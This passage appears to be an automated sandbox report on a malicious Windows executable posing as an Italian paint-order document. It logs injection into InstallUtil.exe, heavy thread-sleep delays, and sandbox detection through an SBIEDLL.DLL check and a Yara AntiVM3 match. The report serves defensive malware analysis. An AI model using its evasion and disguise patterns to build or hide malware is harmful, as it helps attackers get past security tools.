Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Code function: 0_2_07578C48 push gs; ret	0_2_07578C4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00B2DE20 pushfd ; retf	3_2_00B2DE2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_05F22E60 push esp; iretd	3_2_05F22E79

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	File created: \ordine delta vernici s.r.l. 2422-10749 15 gennaio 2025.exe
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	File created: \ordine delta vernici s.r.l. 2422-10749 15 gennaio 2025.exe			Jump to behavior

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe PID: 6332, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2401541375.0000000002E94000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Memory allocated: 1220000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Memory allocated: 2C40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: B20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2600000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: BA0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599559	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599233	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598357	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598248	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597132	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596483	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Window / User API: threadDelayed 2060	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Window / User API: threadDelayed 5667	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 1753	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 8100	Jump to behavior

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 1408	Thread sleep count: 2060 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 1408	Thread sleep count: 5667 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -99856s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -99750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -99640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -99531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -99422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -99297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -99185s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -99078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -98968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe TID: 7136	Thread sleep time: -98858s >= -30000s	Jump to behavior
